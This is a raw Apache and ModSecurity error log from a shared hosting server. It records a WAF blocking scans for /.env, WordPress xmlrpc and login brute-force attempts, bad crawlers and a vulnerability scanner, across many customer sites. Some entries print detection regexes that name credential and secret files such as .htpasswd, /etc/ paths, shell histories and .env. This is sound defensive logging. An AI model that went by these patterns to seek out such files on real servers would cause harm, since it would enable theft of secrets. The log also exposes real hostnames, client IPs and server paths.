[Tue May 26 14:12:14.224972 2026] [security2:error] [pid 585807:tid 585955] [client 79.127.252.66:50413] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jkjuice.taotechservices.com"] [uri "/.env"] [unique_id "ahVc5uHp6I37JgAKrHUlXAAAAJc"]
[Tue May 26 14:12:15.048762 2026] [core:error] [pid 585807:tid 586024] [client 205.210.31.44:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:12:15.048784 2026] [core:error] [pid 585807:tid 586024] [client 205.210.31.44:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:12:15.794794 2026] [security2:error] [pid 585807:tid 586037] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc5-Hp6I37JgAKrHUlfQAAAOg"]
[Tue May 26 14:12:17.947863 2026] [security2:error] [pid 585807:tid 586046] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc6eHp6I37JgAKrHUlpAAAAPA"]
[Tue May 26 14:12:19.454975 2026] [security2:error] [pid 585807:tid 586049] [client 202.141.30.10:35356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc6-Hp6I37JgAKrHUlzAAAAPM"]
[Tue May 26 14:12:19.455129 2026] [security2:error] [pid 585807:tid 586049] [client 202.141.30.10:35356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc6-Hp6I37JgAKrHUlzAAAAPM"]
[Tue May 26 14:12:20.263526 2026] [security2:error] [pid 585807:tid 585975] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc6-Hp6I37JgAKrHUl4QAAAKo"]
[Tue May 26 14:12:21.947539 2026] [security2:error] [pid 585807:tid 586066] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc7eHp6I37JgAKrHUmCwAAAQQ"]
[Tue May 26 14:12:24.140605 2026] [security2:error] [pid 585807:tid 585940] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc7-Hp6I37JgAKrHUmTwAAAIg"]
[Tue May 26 14:12:26.513986 2026] [security2:error] [pid 585807:tid 586043] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc8uHp6I37JgAKrHUmkQAAAO0"]
[Tue May 26 14:12:27.637701 2026] [security2:error] [pid 585807:tid 585999] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc8-Hp6I37JgAKrHUmvAAAAMI"], referer: https://google.com/
[Tue May 26 14:12:28.227100 2026] [security2:error] [pid 585807:tid 585940] [client 207.46.13.151:28594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "emlak.cagmedya.com"] [uri "/index.php/atom.xml"] [unique_id "ahVc9OHp6I37JgAKrHUmywAAiD4"]
[Tue May 26 14:12:28.236382 2026] [security2:error] [pid 585807:tid 586025] [client 222.255.223.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc8-Hp6I37JgAKrHUmwgAAANw"]
[Tue May 26 14:12:28.455016 2026] [security2:error] [pid 585807:tid 586036] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc9OHp6I37JgAKrHUm1AAAAOc"], referer: https://google.com/
[Tue May 26 14:12:29.036333 2026] [security2:error] [pid 585807:tid 585996] [client 103.156.142.125:17448] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVc9OHp6I37JgAKrHUm7QAAv1M"], referer: https://www.ucdc.co.in/aboutus/about-sardardham
[Tue May 26 14:12:29.294775 2026] [security2:error] [pid 585807:tid 585998] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc9OHp6I37JgAKrHUm_AAAAME"]
[Tue May 26 14:12:30.289272 2026] [security2:error] [pid 585807:tid 586002] [client 202.141.30.10:65363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc9uHp6I37JgAKrHUnOQAAAMU"]
[Tue May 26 14:12:30.289370 2026] [security2:error] [pid 585807:tid 586002] [client 202.141.30.10:65363] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVc9uHp6I37JgAKrHUnOQAAAMU"]
[Tue May 26 14:12:30.444370 2026] [autoindex:error] [pid 585807:tid 585951] [client 195.3.220.7:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:12:30.991411 2026] [autoindex:error] [pid 585807:tid 585954] [client 195.3.220.7:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:12:31.523479 2026] [security2:error] [pid 585807:tid 586050] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc9-Hp6I37JgAKrHUnXQAAAPQ"]
[Tue May 26 14:12:31.528344 2026] [autoindex:error] [pid 585807:tid 585984] [client 195.3.220.7:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:12:32.070291 2026] [autoindex:error] [pid 585807:tid 586003] [client 195.3.220.7:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:12:33.420808 2026] [security2:error] [pid 585807:tid 585983] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc-eHp6I37JgAKrHUnnwAAALI"], referer: https://google.com/
[Tue May 26 14:12:34.000161 2026] [security2:error] [pid 585807:tid 585994] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc-eHp6I37JgAKrHUnrQAAAL0"]
[Tue May 26 14:12:34.048663 2026] [security2:error] [pid 585807:tid 585958] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc-eHp6I37JgAKrHUnuAAAAJk"], referer: https://google.com/
[Tue May 26 14:12:34.846955 2026] [security2:error] [pid 585807:tid 586029] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc-uHp6I37JgAKrHUnzwAAAOA"], referer: https://google.com/
[Tue May 26 14:12:35.485135 2026] [security2:error] [pid 585807:tid 585979] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc--Hp6I37JgAKrHUn6AAAAK4"], referer: https://google.com/
[Tue May 26 14:12:35.793023 2026] [security2:error] [pid 585807:tid 585994] [client 74.7.175.186:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ameritradeng.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVc--Hp6I37JgAKrHUn9gAAAL0"]
[Tue May 26 14:12:35.793574 2026] [security2:error] [pid 585807:tid 586040] [client 74.7.175.186:47498] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahVc--Hp6I37JgAKrHUn9AAA6nc"]
[Tue May 26 14:12:36.006798 2026] [autoindex:error] [pid 585807:tid 586020] [client 195.3.220.7:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:12:36.111558 2026] [security2:error] [pid 585807:tid 585949] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVc--Hp6I37JgAKrHUn8gAAAJE"]
[Tue May 26 14:12:36.364082 2026] [autoindex:error] [pid 585807:tid 586057] [client 195.3.220.7:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 14:12:36.841802 2026] [security2:error] [pid 585807:tid 586035] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc_OHp6I37JgAKrHUoEQAAAOY"], referer: https://google.com/
[Tue May 26 14:12:37.478465 2026] [security2:error] [pid 585807:tid 585972] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc_eHp6I37JgAKrHUoJwAAAKc"], referer: https://google.com/
[Tue May 26 14:12:38.111563 2026] [security2:error] [pid 585807:tid 585981] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc_eHp6I37JgAKrHUoNgAAALA"], referer: https://google.com/
[Tue May 26 14:12:38.737720 2026] [security2:error] [pid 585807:tid 585965] [client 195.3.220.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahVc_uHp6I37JgAKrHUoSAAAAKA"], referer: https://google.com/
[Tue May 26 14:12:40.520191 2026] [security2:error] [pid 585807:tid 586045] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdAOHp6I37JgAKrHUoZgAAAO8"]
[Tue May 26 14:12:40.598017 2026] [security2:error] [pid 585807:tid 585986] [client 114.119.155.64:46465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/sloyd/"] [unique_id "ahVdAOHp6I37JgAKrHUocwAAALU"], referer: http://rohiniventures.com/blog/category/parent-category
[Tue May 26 14:12:41.217948 2026] [security2:error] [pid 585807:tid 585949] [client 202.141.30.10:65298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdAeHp6I37JgAKrHUogwAAAJE"]
[Tue May 26 14:12:41.218585 2026] [security2:error] [pid 585807:tid 585949] [client 202.141.30.10:65298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdAeHp6I37JgAKrHUogwAAAJE"]
[Tue May 26 14:12:42.699362 2026] [security2:error] [pid 585807:tid 585979] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdAuHp6I37JgAKrHUooAAAAK4"]
[Tue May 26 14:12:43.847241 2026] [security2:error] [pid 585807:tid 586026] [client 142.132.180.39:49464] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVdA-Hp6I37JgAKrHUoxQAAAN0"], referer: https://thegoodsporting.com
[Tue May 26 14:12:44.015677 2026] [security2:error] [pid 585807:tid 585824] [remote 46.101.75.237:56196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVdA-Hp6I37JgAKrHUoxAABABA"]
[Tue May 26 14:12:44.954464 2026] [security2:error] [pid 585807:tid 586034] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdBOHp6I37JgAKrHUo1wAAAOU"]
[Tue May 26 14:12:46.640803 2026] [security2:error] [pid 585807:tid 586013] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdBuHp6I37JgAKrHUo_wAAANA"]
[Tue May 26 14:12:49.758015 2026] [security2:error] [pid 585807:tid 586048] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdCeHp6I37JgAKrHUpZQAAAPI"]
[Tue May 26 14:12:51.485844 2026] [security2:error] [pid 585807:tid 585964] [client 187.190.154.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdC-Hp6I37JgAKrHUpjgAAAJ8"]
[Tue May 26 14:12:51.704472 2026] [security2:error] [pid 585807:tid 585951] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdC-Hp6I37JgAKrHUplwAAAJM"]
[Tue May 26 14:12:52.331088 2026] [security2:error] [pid 585807:tid 585997] [client 202.141.30.10:35438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdDOHp6I37JgAKrHUppAAAAMA"]
[Tue May 26 14:12:52.331311 2026] [security2:error] [pid 585807:tid 585997] [client 202.141.30.10:35438] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdDOHp6I37JgAKrHUppAAAAMA"]
[Tue May 26 14:12:53.788482 2026] [security2:error] [pid 585807:tid 586032] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdDeHp6I37JgAKrHUpxQAAAOM"]
[Tue May 26 14:12:53.868532 2026] [security2:error] [pid 585807:tid 585889] [remote 195.250.23.247:54686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVdDeHp6I37JgAKrHUp0AAA61E"]
[Tue May 26 14:12:54.084793 2026] [security2:error] [pid 585807:tid 585972] [client 185.191.171.13:40792] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-12-16/day/2024-08-18/"] [unique_id "ahVdDuHp6I37JgAKrHUp2QAAAKc"]
[Tue May 26 14:12:54.084926 2026] [security2:error] [pid 585807:tid 585972] [client 185.191.171.13:40792] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-12-16/day/2024-08-18/"] [unique_id "ahVdDuHp6I37JgAKrHUp2QAAAKc"]
[Tue May 26 14:12:54.799434 2026] [security2:error] [pid 585807:tid 585946] [client 66.249.75.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVdDOHp6I37JgAKrHUptwAAjjo"]
[Tue May 26 14:12:55.545263 2026] [http2:info] [pid 598542:tid 598542] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:12:56.089845 2026] [security2:error] [pid 598542:tid 598686] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdD_4iWyZxnXeAW3I3owAAAA4"]
[Tue May 26 14:12:58.399172 2026] [security2:error] [pid 598542:tid 598777] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdEf4iWyZxnXeAW3I31gAAAGk"]
[Tue May 26 14:13:00.396521 2026] [security2:error] [pid 598542:tid 598727] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdE_4iWyZxnXeAW3I4GgAAADc"]
[Tue May 26 14:13:00.723007 2026] [security2:error] [pid 598542:tid 598559] [remote 74.7.241.58:37504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVdFP4iWyZxnXeAW3I4JgAAPxA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 14:13:02.533370 2026] [security2:error] [pid 598542:tid 598696] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdFv4iWyZxnXeAW3I4RgAAABg"]
[Tue May 26 14:13:02.721031 2026] [security2:error] [pid 598542:tid 598681] [client 147.92.55.81:19681] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVdFv4iWyZxnXeAW3I4RwAAAAk"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 14:13:03.161284 2026] [security2:error] [pid 598542:tid 598725] [client 202.141.30.10:35388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdF_4iWyZxnXeAW3I4XAAAADU"]
[Tue May 26 14:13:03.161409 2026] [security2:error] [pid 598542:tid 598725] [client 202.141.30.10:35388] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdF_4iWyZxnXeAW3I4XAAAADU"]
